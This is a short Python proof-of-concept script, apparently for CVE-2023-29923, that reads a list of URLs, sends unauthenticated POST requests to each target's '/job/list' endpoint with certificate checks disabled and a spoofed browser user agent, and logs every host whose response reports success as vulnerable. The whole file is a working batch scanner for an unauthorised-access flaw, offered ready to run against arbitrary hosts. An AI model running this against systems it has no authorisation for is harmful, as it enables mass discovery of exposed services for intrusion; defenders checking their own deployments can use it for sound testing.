import argparse
import time
import requests

parser = argparse.ArgumentParser(description='CVE-2023-29923 PoC ---By:LEO')
parser.add_argument('-f',help='Batch detection file name',type=str)
args = parser.parse_args()
file = args.f


def get_url(file):
    with open('{}'.format(file),'r',encoding='utf-8') as f:
        for i in f:
            i = i.replace('\n', '')
            send_req(i)

def write_result(content):
    f = open("result.txt", "a", encoding="UTF-8")
    f.write('{}\n'.format(content))
    f.close()


def send_req(url_check):
    print('{} runing Check'.format(url_check))
    url = url_check + '/job/list'
    header = {
        'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69',
        'Content-Type':'application/json;charset=UTF-8',
        'Accept-Encoding':'gzip, deflate',
        'Accept-Language':'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6'
    }
    data = {
        "appId":1,
        "index":0,
        "pageSize":10
    }
    try:
        requests.packages.urllib3.disable_warnings()
        response = requests.post(url=url,headers=header,json=data,verify=False,timeout=3).json()
        if response['success']:
            print('{}  Vulnerability exists!\n'.format(url_check))
            write_result(url_check)
        time.sleep(1)

    except Exception as e:
        pass


if __name__ == '__main__':
    if file is None:
        print('请输在当前目录下新建需要检测的url.txt')
    else:
        get_url(file)